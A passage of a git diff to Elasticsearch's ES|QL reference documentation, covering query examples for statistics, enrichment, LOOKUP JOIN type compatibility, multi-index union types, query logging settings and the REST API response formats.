The values in the column are computed by dividing `event_duration` by 1,000,000. In other words: `event_duration` is converted from nanoseconds to milliseconds. + +```esql +FROM sample_data +| EVAL duration_ms = event_duration/1000000.0 +``` + +`EVAL` supports several [functions](commands/eval.md). For example, to round a number to the closest number with the specified number of digits, use the [`ROUND`](functions-operators/math-functions.md#esql-round) function: + +```esql +FROM sample_data +| EVAL duration_ms = ROUND(event_duration/1000000.0, 1) +``` + + +## Calculate statistics [esql-getting-started-stats] + +You can use {{esql}} not only to query your data, but also to aggregate it. Use the [`STATS`](commands/stats-by.md) command to calculate statistics. For example, the median duration: + +```esql +FROM sample_data +| STATS median_duration = MEDIAN(event_duration) +``` + +You can calculate multiple stats with one command: + +```esql +FROM sample_data +| STATS median_duration = MEDIAN(event_duration), max_duration = MAX(event_duration) +``` + +Use `BY` to group calculated stats by one or more columns. For example, to calculate the median duration per client IP: + +```esql +FROM sample_data +| STATS median_duration = MEDIAN(event_duration) BY client_ip +``` + + +## Access columns [esql-getting-started-access-columns] + +You can access columns by their name. If a name contains special characters, [it needs to be quoted](esql-syntax.md#esql-identifiers) with backticks (```). + +Assigning an explicit name to a column created by `EVAL` or `STATS` is optional. If you don’t provide a name, the new column name is equal to the function expression. For example: + +```esql +FROM sample_data +| EVAL event_duration/1000000.0 +``` + +In this query, `EVAL` adds a new column named `event_duration/1000000.0`. Because its name contains special characters, to access this column, quote it with backticks: + +```esql +FROM sample_data +| EVAL event_duration/1000000.0 +| STATS MEDIAN(`event_duration/1000000.0`) +``` + + +## Create a histogram [esql-getting-started-histogram] + +To track statistics over time, {{esql}} enables you to create histograms using the [`BUCKET`](functions-operators/grouping-functions.md#esql-bucket) function. `BUCKET` creates human-friendly bucket sizes and returns a value for each row that corresponds to the resulting bucket the row falls into. + +Combine `BUCKET` with [`STATS`](commands/stats-by.md) to create a histogram. For example, to count the number of events per hour: + +```esql +FROM sample_data +| STATS c = COUNT(*) BY bucket = BUCKET(@timestamp, 24, "2023-10-23T00:00:00Z", "2023-10-23T23:59:59Z") +``` + +Or the median duration per hour: + +```esql +FROM sample_data +| KEEP @timestamp, event_duration +| STATS median_duration = MEDIAN(event_duration) BY bucket = BUCKET(@timestamp, 24, "2023-10-23T00:00:00Z", "2023-10-23T23:59:59Z") +``` + + +## Enrich data [esql-getting-started-enrich] + +{{esql}} enables you to [enrich](esql-enrich-data.md) a table with data from indices in {{es}}, using the [`ENRICH`](commands/enrich.md) command. + +:::{image} ../images/elasticsearch-reference-esql-enrich.png +:alt: esql enrich +::: + +Before you can use `ENRICH`, you first need to [create](esql-enrich-data.md#esql-create-enrich-policy) and [execute](esql-enrich-data.md#esql-execute-enrich-policy) an [enrich policy](esql-enrich-data.md#esql-enrich-policy).
+ +:::::::{tab-set} + +::::::{tab-item} Own deployment +The following requests create and execute a policy called `clientip_policy`. The policy links an IP address to an environment ("Development", "QA", or "Production"): + +```console +PUT clientips +{ + "mappings": { + "properties": { + "client_ip": { + "type": "keyword" + }, + "env": { + "type": "keyword" + } + } + } +} + +PUT clientips/_bulk +{ "index" : {}} +{ "client_ip": "172.21.0.5", "env": "Development" } +{ "index" : {}} +{ "client_ip": "172.21.2.113", "env": "QA" } +{ "index" : {}} +{ "client_ip": "172.21.2.162", "env": "QA" } +{ "index" : {}} +{ "client_ip": "172.21.3.15", "env": "Production" } +{ "index" : {}} +{ "client_ip": "172.21.3.16", "env": "Production" } + +PUT /_enrich/policy/clientip_policy +{ + "match": { + "indices": "clientips", + "match_field": "client_ip", + "enrich_fields": ["env"] + } +} + +PUT /_enrich/policy/clientip_policy/_execute?wait_for_completion=false +``` +:::::: + +::::::{tab-item} Demo environment +On the demo environment at [ela.st/ql](https://ela.st/ql/), an enrich policy called `clientip_policy` has already been created and executed. The policy links an IP address to an environment ("Development", "QA", or "Production"). +:::::: + +::::::: +After creating and executing a policy, you can use it with the `ENRICH` command: + +```esql +FROM sample_data +| KEEP @timestamp, client_ip, event_duration +| EVAL client_ip = TO_STRING(client_ip) +| ENRICH clientip_policy ON client_ip WITH env +``` + +You can use the new `env` column that’s added by the `ENRICH` command in subsequent commands. For example, to calculate the median duration per environment: + +```esql +FROM sample_data +| KEEP @timestamp, client_ip, event_duration +| EVAL client_ip = TO_STRING(client_ip) +| ENRICH clientip_policy ON client_ip WITH env +| STATS median_duration = MEDIAN(event_duration) BY env +``` + +For more about data enrichment with {{esql}}, refer to [Data enrichment](esql-enrich-data.md). + + +## Process data [esql-getting-started-process-data] + +Your data may contain unstructured strings that you want to [structure](esql-process-data-with-dissect-grok.md) to make it easier to analyze the data. For example, the sample data contains log messages like: + +```txt +"Connected to 10.1.0.3" +``` + +By extracting the IP address from these messages, you can determine which IP has accepted the most client connections. + +To structure unstructured strings at query time, you can use the {{esql}} [`DISSECT`](commands/dissect.md) and [`GROK`](commands/grok.md) commands. `DISSECT` works by breaking up a string using a delimiter-based pattern. `GROK` works similarly, but uses regular expressions. This makes `GROK` more powerful, but generally also slower. + +In this case, no regular expressions are needed, as the `message` is straightforward: "Connected to ", followed by the server IP. To match this string, you can use the following `DISSECT` command: + +```esql +FROM sample_data +| DISSECT message "Connected to %{server_ip}" +``` + +This adds a `server_ip` column to those rows that have a `message` that matches this pattern. For other rows, the value of `server_ip` is `null`. + +You can use the new `server_ip` column that’s added by the `DISSECT` command in subsequent commands.
For example, to determine how many connections each server has accepted: + +```esql +FROM sample_data +| WHERE STARTS_WITH(message, "Connected to") +| DISSECT message "Connected to %{server_ip}" +| STATS COUNT(*) BY server_ip +``` + +For more about data processing with {{esql}}, refer to [Data processing with DISSECT and GROK](esql-process-data-with-dissect-grok.md). + + +## Learn more [esql-getting-learn-more] + +- Explore the zero-setup, live [{{esql}} demo environment](http://esql.demo.elastic.co/). +- Follow along with our hands-on tutorials: + - [Search and filter with {{esql}}](/reference/query-languages/esql/esql-search-tutorial.md): A hands-on tutorial that shows you how to use {{esql}} to search and filter data. + - [Threat hunting with {{esql}}](docs-content://solutions/security/esql-for-security/esql-threat-hunting-tutorial.md): A hands-on tutorial that shows you how to use {{esql}} for advanced threat hunting techniques and security analysis. \ No newline at end of file diff --git a/docs/reference/query-languages/esql/esql-lookup-join.md b/docs/reference/query-languages/esql/esql-lookup-join.md index d57437833c1b2..ce85bbedc12fa 100644 --- a/docs/reference/query-languages/esql/esql-lookup-join.md +++ b/docs/reference/query-languages/esql/esql-lookup-join.md @@ -6,7 +6,7 @@ mapped_pages: # Join data from multiple indices with `LOOKUP JOIN` [esql-lookup-join-reference] -The {{esql}} [`LOOKUP JOIN`](/reference/query-languages/esql/commands/processing-commands.md#esql-lookup-join) processing command combines data from your {{esql}} query results table with matching records from a specified lookup index. It adds fields from the lookup index as new columns to your results table based on matching values in the join field. +The {{esql}} [`LOOKUP JOIN`](/reference/query-languages/esql/commands/lookup-join.md) processing command combines data from your {{esql}} query results table with matching records from a specified lookup index. It adds fields from the lookup index as new columns to your results table based on matching values in the join field. Teams often have data scattered across multiple indices – like logs, IPs, user IDs, hosts, employees etc. Without a direct way to enrich or correlate each event with reference data, root-cause analysis, security checks, and operational insights become time-consuming. For example, you can use `LOOKUP JOIN` to: @@ -18,7 +18,7 @@ For example, you can use `LOOKUP JOIN` to: ## Compare with `ENRICH` -[`LOOKUP JOIN`](/reference/query-languages/esql/commands/processing-commands.md#esql-lookup-join) is similar to [`ENRICH`](/reference/query-languages/esql/commands/processing-commands.md#esql-enrich) in the fact that they both help you join data together. You should use `LOOKUP JOIN` when: +[`LOOKUP JOIN`](/reference/query-languages/esql/commands/lookup-join.md) is similar to [`ENRICH`](/reference/query-languages/esql/commands/enrich.md) in that they both help you join data together. You should use `LOOKUP JOIN` when: * Your enrichment data changes frequently * You want to avoid index-time processing @@ -138,23 +138,42 @@ A successful query will output a table. In this example, you can see that the `s ### Additional examples -Refer to the examples section of the [`LOOKUP JOIN`](/reference/query-languages/esql/commands/processing-commands.md#esql-lookup-join) command reference for more examples. +Refer to the examples section of the [`LOOKUP JOIN`](/reference/query-languages/esql/commands/lookup-join.md) command reference for more examples.
## Prerequisites [esql-lookup-join-prereqs] -To use `LOOKUP JOIN`, the following requirements must be met: +### Index configuration -* Indices used for lookups must be configured with the [`lookup` index mode](/reference/elasticsearch/index-settings/index-modules.md#index-mode-setting) -* **Compatible data types**: The join key and join field in the lookup index must have compatible data types. This means: - * The data types must either be identical or be internally represented as the same type in {{esql}} - * Numeric types follow these compatibility rules: - * `short` and `byte` are compatible with `integer` (all represented as `int`) - * `float`, `half_float`, and `scaled_float` are compatible with `double` (all represented as `double`) - * For text fields: You can only use text fields as the join key on the left-hand side of the join and only if they have a `.keyword` subfield +Indices used for lookups must be configured with the [`lookup` index mode](/reference/elasticsearch/index-settings/index-modules.md#index-mode-setting). +### Data type compatibility + +Join keys must have compatible data types between the source and lookup indices. Types within the same compatibility group can be joined together: + +| Compatibility group | Types | Notes | +|------------------------|-------------------------------------------------------------------------------------|----------------------------------------------------------------------------------| +| **Numeric family** | `byte`, `short`, `integer`, `long`, `half_float`, `float`, `scaled_float`, `double` | All compatible | +| **Keyword family** | `keyword`, `text.keyword` | Text fields only as join key on left-hand side and must have `.keyword` subfield | +| **Date (Exact)** | `date` | Must match exactly | +| **Date Nanos (Exact)** | `date_nanos` | Must match exactly | +| **Boolean** | `boolean` | Must match exactly | + +```{tip} To obtain a join key with a compatible type, use a [conversion function](/reference/query-languages/esql/functions-operators/type-conversion-functions.md) if needed. +``` -For a complete list of supported data types and their internal representations, see the [Supported Field Types documentation](/reference/query-languages/esql/limitations.md#_supported_types). +### Unsupported Types + +In addition to the [{{esql}} unsupported field types](/reference/query-languages/esql/limitations.md#_unsupported_types), `LOOKUP JOIN` does not support: + +* `VERSION` +* `UNSIGNED_LONG` +* Spatial types like `GEO_POINT`, `GEO_SHAPE` +* Temporal intervals like `DURATION`, `PERIOD` + +```{note} +For a complete list of all types supported in `LOOKUP JOIN`, refer to the [`LOOKUP JOIN` supported types table](/reference/query-languages/esql/commands/lookup-join.md). +``` ## Usage notes @@ -181,6 +200,7 @@ The following are the current limitations with `LOOKUP JOIN`: * Indices in [`lookup` mode](/reference/elasticsearch/index-settings/index-modules.md#index-mode-setting) are always single-sharded. * Cross cluster search is unsupported initially. Both source and lookup indices must be local. * Currently, only matching on equality is supported. -* `LOOKUP JOIN` can only use a single match field and a single index. Wildcards, aliases, datemath, and datastreams are not supported. +* `LOOKUP JOIN` can only use a single match field and a single index. Wildcards are not supported. + * Aliases, datemath, and datastreams are supported, as long as the index pattern matches a single concrete index {applies_to}`stack: ga 9.1.0`. 
* The name of the match field in `LOOKUP JOIN lu_idx ON match_field` must match an existing field in the query. This may require `RENAME`s or `EVAL`s to achieve. * The query will circuit break if there are too many matching documents in the lookup index, or if the documents are too large. More precisely, `LOOKUP JOIN` works in batches of, normally, about 10,000 rows; a large amount of heap space is needed if the matching documents from the lookup index for a batch are multiple megabytes or larger. This is roughly the same as for `ENRICH`. diff --git a/docs/reference/query-languages/esql/esql-metadata-fields.md b/docs/reference/query-languages/esql/esql-metadata-fields.md index 0dd5f5db941f6..b75b35680ce93 100644 --- a/docs/reference/query-languages/esql/esql-metadata-fields.md +++ b/docs/reference/query-languages/esql/esql-metadata-fields.md @@ -8,7 +8,7 @@ mapped_pages: {{esql}} can access [metadata fields](/reference/elasticsearch/mapping-reference/document-metadata-fields.md). -To access these fields, use the `METADATA` directive with the [`FROM`](/reference/query-languages/esql/commands/source-commands.md#esql-from) source command. For example: +To access these fields, use the `METADATA` directive with the [`FROM`](/reference/query-languages/esql/commands/from.md) source command. For example: ```esql FROM index METADATA _index, _id ``` diff --git a/docs/reference/query-languages/esql/esql-multi-index.md b/docs/reference/query-languages/esql/esql-multi-index.md new file mode 100644 index 0000000000000..b35996329ed05 --- /dev/null +++ b/docs/reference/query-languages/esql/esql-multi-index.md @@ -0,0 +1,159 @@ +--- +navigation_title: Query multiple indices +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-multi-index.html +applies_to: + stack: ga + serverless: ga +products: + - id: elasticsearch +--- + +# Use ES|QL to query multiple indices [esql-multi-index] + +With {{esql}}, you can execute a single query across multiple indices, data streams, or aliases. To do so, use wildcards and date arithmetic. The following example uses a comma-separated list and a wildcard: + +```esql +FROM employees-00001,other-employees-* +``` + +Use the format `<remote_cluster_name>:<target>` to [query data streams and indices on remote clusters](esql-cross-clusters.md): + +```esql +FROM cluster_one:employees-00001,cluster_two:other-employees-* +``` + + +## Field type mismatches [esql-multi-index-invalid-mapping] + +When querying multiple indices, data streams, or aliases, you might find that the same field is mapped to multiple different types.
For example, consider the two indices with the following field mappings: + +**index: events_ip** + +``` +{ + "mappings": { + "properties": { + "@timestamp": { "type": "date" }, + "client_ip": { "type": "ip" }, + "event_duration": { "type": "long" }, + "message": { "type": "keyword" } + } + } +} +``` + +**index: events_keyword** + +``` +{ + "mappings": { + "properties": { + "@timestamp": { "type": "date" }, + "client_ip": { "type": "keyword" }, + "event_duration": { "type": "long" }, + "message": { "type": "keyword" } + } + } +} +``` + +When you query each of these individually with a simple query like `FROM events_ip`, the results are provided with type-specific columns: + +```esql +FROM events_ip +| SORT @timestamp DESC +``` + +| @timestamp:date | client_ip:ip | event_duration:long | message:keyword | +| --- | --- | --- | --- | +| 2023-10-23T13:55:01.543Z | 172.21.3.15 | 1756467 | Connected to 10.1.0.1 | +| 2023-10-23T13:53:55.832Z | 172.21.3.15 | 5033755 | Connection error | +| 2023-10-23T13:52:55.015Z | 172.21.3.15 | 8268153 | Connection error | + +Note how the `client_ip` column is correctly identified as type `ip`, and all values are displayed. However, if instead the query sources two conflicting indices with `FROM events_*`, the type of the `client_ip` column cannot be determined and is reported as `unsupported` with all values returned as `null`. + +$$$query-unsupported$$$ + +```esql +FROM events_* +| SORT @timestamp DESC +``` + +| @timestamp:date | client_ip:unsupported | event_duration:long | message:keyword | +| --- | --- | --- | --- | +| 2023-10-23T13:55:01.543Z | null | 1756467 | Connected to 10.1.0.1 | +| 2023-10-23T13:53:55.832Z | null | 5033755 | Connection error | +| 2023-10-23T13:52:55.015Z | null | 8268153 | Connection error | +| 2023-10-23T13:51:54.732Z | null | 725448 | Connection error | +| 2023-10-23T13:33:34.937Z | null | 1232382 | Disconnected | +| 2023-10-23T12:27:28.948Z | null | 2764889 | Connected to 10.1.0.2 | +| 2023-10-23T12:15:03.360Z | null | 3450233 | Connected to 10.1.0.3 | + +In addition, if the query refers to this unsupported field directly, the query fails: + +```esql +FROM events_* +| SORT client_ip DESC +``` + +```bash +Cannot use field [client_ip] due to ambiguities being mapped as +[2] incompatible types: + [ip] in [events_ip], + [keyword] in [events_keyword] +``` + + +## Union types [esql-multi-index-union-types] + +::::{warning} +This functionality is in technical preview and may be changed or removed in a future release. Elastic will work to fix any issues, but features in technical preview are not subject to the support SLA of official GA features. +:::: + + +{{esql}} has a way to handle [field type mismatches](#esql-multi-index-invalid-mapping). When the same field is mapped to multiple types in multiple indices, the type of the field is understood to be a *union* of the various types in the index mappings. As seen in the preceding examples, this *union type* cannot be used in the results, and cannot be referred to by the query — except in `KEEP`, `DROP` or when it’s passed to a type conversion function that accepts all the types in the *union* and converts the field to a single type. {{esql}} offers a suite of [type conversion functions](functions-operators/type-conversion-functions.md) to achieve this. + +In the above examples, the query can use a command like `EVAL client_ip = TO_IP(client_ip)` to resolve the union of `ip` and `keyword` to just `ip`. You can also use the type-conversion syntax `EVAL client_ip = client_ip::IP`. 
Alternatively, the query could use [`TO_STRING`](functions-operators/type-conversion-functions.md#esql-to_string) to convert all supported types into `KEYWORD`. + +For example, the [query](#query-unsupported) that returned `client_ip:unsupported` with `null` values can be improved using the `TO_IP` function or the equivalent `field::ip` syntax. These changes also resolve the error message. As long as the only reference to the original field is to pass it to a conversion function that resolves the type ambiguity, no error results. + +```esql +FROM events_* +| EVAL client_ip = TO_IP(client_ip) +| KEEP @timestamp, client_ip, event_duration, message +| SORT @timestamp DESC +``` + +| @timestamp:date | client_ip:ip | event_duration:long | message:keyword | +| --- | --- | --- | --- | +| 2023-10-23T13:55:01.543Z | 172.21.3.15 | 1756467 | Connected to 10.1.0.1 | +| 2023-10-23T13:53:55.832Z | 172.21.3.15 | 5033755 | Connection error | +| 2023-10-23T13:52:55.015Z | 172.21.3.15 | 8268153 | Connection error | +| 2023-10-23T13:51:54.732Z | 172.21.3.15 | 725448 | Connection error | +| 2023-10-23T13:33:34.937Z | 172.21.0.5 | 1232382 | Disconnected | +| 2023-10-23T12:27:28.948Z | 172.21.2.113 | 2764889 | Connected to 10.1.0.2 | +| 2023-10-23T12:15:03.360Z | 172.21.2.162 | 3450233 | Connected to 10.1.0.3 | + + +## Index metadata [esql-multi-index-index-metadata] + +It can be helpful to know the particular index from which each row is sourced. To get this information, use the [`METADATA`](esql-metadata-fields.md) option on the [`FROM`](commands/from.md) command. + +```esql +FROM events_* METADATA _index +| EVAL client_ip = TO_IP(client_ip) +| KEEP _index, @timestamp, client_ip, event_duration, message +| SORT @timestamp DESC +``` + +| _index:keyword | @timestamp:date | client_ip:ip | event_duration:long | message:keyword | +| --- | --- | --- | --- | --- | +| events_ip | 2023-10-23T13:55:01.543Z | 172.21.3.15 | 1756467 | Connected to 10.1.0.1 | +| events_ip | 2023-10-23T13:53:55.832Z | 172.21.3.15 | 5033755 | Connection error | +| events_ip | 2023-10-23T13:52:55.015Z | 172.21.3.15 | 8268153 | Connection error | +| events_keyword | 2023-10-23T13:51:54.732Z | 172.21.3.15 | 725448 | Connection error | +| events_keyword | 2023-10-23T13:33:34.937Z | 172.21.0.5 | 1232382 | Disconnected | +| events_keyword | 2023-10-23T12:27:28.948Z | 172.21.2.113 | 2764889 | Connected to 10.1.0.2 | +| events_keyword | 2023-10-23T12:15:03.360Z | 172.21.2.162 | 3450233 | Connected to 10.1.0.3 | + diff --git a/docs/reference/query-languages/esql/esql-multi.md b/docs/reference/query-languages/esql/esql-multi.md new file mode 100644 index 0000000000000..c419703ed72d8 --- /dev/null +++ b/docs/reference/query-languages/esql/esql-multi.md @@ -0,0 +1,13 @@ +--- +applies_to: + stack: ga + serverless: ga +navigation_title: Query multiple sources +--- + +# Query multiple indices or clusters with {{esql}} + +{{esql}} allows you to query across multiple indices or clusters. 
Learn more in the following sections: + +* [Query multiple indices](esql-multi-index.md) +* [Query across clusters](esql-cross-clusters.md) \ No newline at end of file diff --git a/docs/reference/query-languages/esql/esql-process-data-with-dissect-grok.md b/docs/reference/query-languages/esql/esql-process-data-with-dissect-grok.md index ee4edeb7f91e1..178fb3a28a206 100644 --- a/docs/reference/query-languages/esql/esql-process-data-with-dissect-grok.md +++ b/docs/reference/query-languages/esql/esql-process-data-with-dissect-grok.md @@ -13,7 +13,7 @@ Your data may contain unstructured strings that you want to structure. This make :alt: unstructured data ::: -{{es}} can structure your data at index time or query time. At index time, you can use the [Dissect](/reference/enrich-processor/dissect-processor.md) and [Grok](/reference/enrich-processor/grok-processor.md) ingest processors, or the {{ls}} [Dissect](logstash-docs-md://lsr//plugins-filters-dissect.md) and [Grok](logstash-docs-md://lsr//plugins-filters-grok.md) filters. At query time, you can use the {{esql}} [`DISSECT`](/reference/query-languages/esql/commands/processing-commands.md#esql-dissect) and [`GROK`](/reference/query-languages/esql/commands/processing-commands.md#esql-grok) commands. +{{es}} can structure your data at index time or query time. At index time, you can use the [Dissect](/reference/enrich-processor/dissect-processor.md) and [Grok](/reference/enrich-processor/grok-processor.md) ingest processors, or the {{ls}} [Dissect](logstash-docs-md://lsr//plugins-filters-dissect.md) and [Grok](logstash-docs-md://lsr//plugins-filters-grok.md) filters. At query time, you can use the {{esql}} [`DISSECT`](/reference/query-languages/esql/commands/dissect.md) and [`GROK`](/reference/query-languages/esql/commands/grok.md) commands. ## `DISSECT` or `GROK`? Or both? [esql-grok-or-dissect] @@ -24,7 +24,7 @@ You can use both `DISSECT` and `GROK` for hybrid use cases. For example when a s ## Process data with `DISSECT` [esql-process-data-with-dissect] -The [`DISSECT`](/reference/query-languages/esql/commands/processing-commands.md#esql-dissect) processing command matches a string against a delimiter-based pattern, and extracts the specified keys as columns. +The [`DISSECT`](/reference/query-languages/esql/commands/dissect.md) processing command matches a string against a delimiter-based pattern, and extracts the specified keys as columns. For example, the following pattern: @@ -206,7 +206,7 @@ The `DISSECT` command does not support reference keys. ## Process data with `GROK` [esql-process-data-with-grok] -The [`GROK`](/reference/query-languages/esql/commands/processing-commands.md#esql-grok) processing command matches a string against a pattern based on regular expressions, and extracts the specified keys as columns. +The [`GROK`](/reference/query-languages/esql/commands/grok.md) processing command matches a string against a pattern based on regular expressions, and extracts the specified keys as columns. For example, the following pattern: diff --git a/docs/reference/query-languages/esql/esql-query-log.md b/docs/reference/query-languages/esql/esql-query-log.md new file mode 100644 index 0000000000000..05c7f41134a9c --- /dev/null +++ b/docs/reference/query-languages/esql/esql-query-log.md @@ -0,0 +1,130 @@ +--- +navigation_title: "Query log" +--- + +# {{esql}} Query log [esql-query-log] + + +The {{esql}} query log lets you log {{esql}} queries based on their execution time.
+ +You can use these logs to investigate, analyze, or troubleshoot your cluster’s historical {{esql}} performance. + +The {{esql}} query log reports task duration at the coordinator level, but might not encompass the full task execution time observed on the client. For example, logs don’t surface HTTP network delays. + +Events that meet the specified threshold are emitted into [{{es}} server logs](docs-content://deploy-manage/monitor/logging-configuration/update-elasticsearch-logging-levels.md). + +These logs can be found in the local {{es}} logs directory. Query log files have a suffix of `_esql_querylog.json`. + +## Query log format [query-log-format] + +The following is an example of a successful query event in the query log: + +```js +{ + "@timestamp": "2025-03-11T08:39:50.076Z", + "log.level": "TRACE", + "auth.type": "REALM", + "elasticsearch.querylog.planning.took": 3108666, + "elasticsearch.querylog.planning.took_millis": 3, + "elasticsearch.querylog.query": "from index | limit 100", + "elasticsearch.querylog.search_type": "ESQL", + "elasticsearch.querylog.success": true, + "elasticsearch.querylog.took": 8050416, + "elasticsearch.querylog.took_millis": 8, + "user.name": "elastic-admin", + "user.realm": "default_file", + "ecs.version": "1.2.0", + "service.name": "ES_ECS", + "event.dataset": "elasticsearch.esql_querylog", + "process.thread.name": "elasticsearch[runTask-0][esql_worker][T#12]", + "log.logger": "esql.querylog.query", + "elasticsearch.cluster.uuid": "KZo1V7TcQM-O6fnqMm1t_g", + "elasticsearch.node.id": "uPgRE2TrSfa9IvnUpNT1Uw", + "elasticsearch.node.name": "runTask-0", + "elasticsearch.cluster.name": "runTask" +} +``` + +The following is an example of a failing query event in the query log: + +```js +{ + "@timestamp": "2025-03-11T08:41:54.172Z", + "log.level": "TRACE", + "auth.type": "REALM", + "elasticsearch.querylog.error.message": "line 1:15: mismatched input 'limitxyz' expecting {DEV_CHANGE_POINT, 'enrich', 'dissect', 'eval', 'grok', 'limit', 'sort', 'stats', 'where', DEV_INLINESTATS, DEV_FORK, 'lookup', DEV_JOIN_LEFT, DEV_JOIN_RIGHT, DEV_LOOKUP, 'mv_expand', 'drop', 'keep', DEV_INSIST, 'rename'}", + "elasticsearch.querylog.error.type": "org.elasticsearch.xpack.esql.parser.ParsingException", + "elasticsearch.querylog.query": "from person | limitxyz 100", + "elasticsearch.querylog.search_type": "ESQL", + "elasticsearch.querylog.success": false, + "elasticsearch.querylog.took": 963750, + "elasticsearch.querylog.took_millis": 0, + "user.name": "elastic-admin", + "user.realm": "default_file", + "ecs.version": "1.2.0", + "service.name": "ES_ECS", + "event.dataset": "elasticsearch.esql_querylog", + "process.thread.name": "elasticsearch[runTask-0][search][T#16]", + "log.logger": "esql.querylog.query", + "elasticsearch.cluster.uuid": "KZo1V7TcQM-O6fnqMm1t_g", + "elasticsearch.node.id": "uPgRE2TrSfa9IvnUpNT1Uw", + "elasticsearch.node.name": "runTask-0", + "elasticsearch.cluster.name": "runTask" +} +``` + + +## Enable query logging [enable-query-log] + +You can enable query logging at the cluster level. + +By default, all thresholds are set to `-1`, which results in no events being logged. + +Query log thresholds can be enabled for the four logging levels: `trace`, `debug`, `info`, and `warn`.
+ +To view the current query log settings, use the [get cluster settings API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-get-settings): + +```console +GET _cluster/settings?filter_path=*.esql.querylog.* +``` + +You can use the `esql.querylog.include.user` setting to append `user.*` and `auth.type` fields to query log entries. These fields contain information about the user who triggered the request. + +The following snippet adjusts all available {{esql}} query log settings using the [update cluster settings API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-settings): + +```console +PUT /_cluster/settings +{ + "transient": { + "esql.querylog.threshold.warn": "10s", + "esql.querylog.threshold.info": "5s", + "esql.querylog.threshold.debug": "2s", + "esql.querylog.threshold.trace": "500ms", + "esql.querylog.include.user": true + } +} +``` + + + +## Best practices for query logging [troubleshoot-query-log] + +Logging slow requests can be resource-intensive for your {{es}} cluster, depending on the volume of qualifying traffic. For example, emitted logs might increase the index disk usage of your [{{es}} monitoring](docs-content://deploy-manage/monitor/stack-monitoring.md) cluster. To reduce the impact of query logging, consider the following: + +* Set high thresholds to reduce the number of logged events. +* Enable query logging only when troubleshooting. + +If you aren’t sure how to start investigating traffic issues, consider starting with a high `warn` threshold, such as `30s`, using the [update cluster settings API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-settings). + +Here is an example of how to change cluster settings to enable query logging at the `warn` level, for queries taking more than 30 seconds, and include user information in the logs: + +```console +PUT /_cluster/settings +{ + "transient": { + "esql.querylog.include.user": true, + "esql.querylog.threshold.warn": "30s" + } +} +``` + diff --git a/docs/reference/query-languages/esql/esql-rest.md b/docs/reference/query-languages/esql/esql-rest.md new file mode 100644 index 0000000000000..ac1c5deab722d --- /dev/null +++ b/docs/reference/query-languages/esql/esql-rest.md @@ -0,0 +1,353 @@ +--- +navigation_title: "REST API" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-rest.html +applies_to: + stack: ga + serverless: ga +products: + - id: elasticsearch +--- + +# Use the {{esql}} REST API [esql-rest] + +::::{tip} +The [Search and filter with {{esql}}](/reference/query-languages/esql/esql-search-tutorial.md) tutorial provides a hands-on introduction to the {{esql}} `_query` API. +:::: + +## Overview [esql-rest-overview] + +The [`_query` API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-esql) accepts an {{esql}} query string in the `query` parameter, runs it, and returns the results. For example: + +```console +POST /_query?format=txt +{ + "query": "FROM library | KEEP author, name, page_count, release_date | SORT page_count DESC | LIMIT 5" +} +``` + +Which returns: + +```text + author | name | page_count | release_date +-----------------+--------------------+---------------+------------------------ +Peter F. Hamilton|Pandora's Star |768 |2004-03-02T00:00:00.000Z +Vernor Vinge |A Fire Upon the Deep|613 |1992-06-01T00:00:00.000Z +Frank Herbert |Dune |604 |1965-06-01T00:00:00.000Z +Alastair Reynolds|Revelation Space |585 |2000-03-15T00:00:00.000Z +James S.A.
Corey |Leviathan Wakes |561 |2011-06-02T00:00:00.000Z +``` + + +### Run the {{esql}} query API in Console [esql-kibana-console] + +We recommend using [Console](docs-content://explore-analyze/query-filter/tools/console.md) to run the {{esql}} query API, because of its rich autocomplete features. + +When creating the query, using triple quotes (`"""`) allows you to use special characters like quotes (`"`) without having to escape them. They also make it easier to write multi-line requests. + +```console +POST /_query?format=txt +{ + "query": """ + FROM library + | KEEP author, name, page_count, release_date + | SORT page_count DESC + | LIMIT 5 + """ +} +``` + +### Response formats [esql-rest-format] + +{{esql}} can return the data in the following human-readable and binary formats. You can set the format by specifying the `format` parameter in the URL or by setting the `Accept` or `Content-Type` HTTP header. + +For example: + +```console +POST /_query?format=yaml +``` + +::::{note} +The URL parameter takes precedence over the HTTP headers. If neither is specified, the response is returned in the same format as the request. +:::: + +#### Structured formats + +Complete responses with metadata. Useful for automatic parsing. + +| `format` | HTTP header | Description | +| --- | --- | --- | +| `json` | `application/json` | [JSON](https://www.json.org/) (JavaScript Object Notation) human-readable format | +| `yaml` | `application/yaml` | [YAML](https://en.wikipedia.org/wiki/YAML) (YAML Ain’t Markup Language) human-readable format | + +#### Tabular formats + +Query results only, without metadata. Useful for quick and manual data previews. + +| `format` | HTTP header | Description | +| --- | --- | --- | +| `csv` | `text/csv` | [Comma-separated values](https://en.wikipedia.org/wiki/Comma-separated_values) | +| `tsv` | `text/tab-separated-values` | [Tab-separated values](https://en.wikipedia.org/wiki/Tab-separated_values) | +| `txt` | `text/plain` | CLI-like representation | + +::::{tip} +The `csv` format accepts a formatting URL query attribute, `delimiter`, which indicates which character should be used to separate the CSV values. It defaults to comma (`,`) and cannot take any of the following values: double quote (`"`), carriage-return (`\r`), and new-line (`\n`). The tab (`\t`) cannot be used either; use the `tsv` format instead. +:::: + +#### Binary formats + +Compact binary encoding. To be used by applications. + +| `format` | HTTP header | Description | +| --- | --- | --- | +| `cbor` | `application/cbor` | [Concise Binary Object Representation](https://cbor.io/) | +| `smile` | `application/smile` | [Smile](https://en.wikipedia.org/wiki/Smile_(data_interchange_format)) binary data format similar to CBOR | +| `arrow` | `application/vnd.apache.arrow.stream` | **Experimental.** [Apache Arrow](https://arrow.apache.org/) dataframes, [IPC streaming format](https://arrow.apache.org/docs/format/Columnar.html#ipc-streaming-format) | + + +### Filtering using {{es}} Query DSL [esql-rest-filtering] + +Specify a Query DSL query in the `filter` parameter to filter the set of documents that an {{esql}} query runs on.
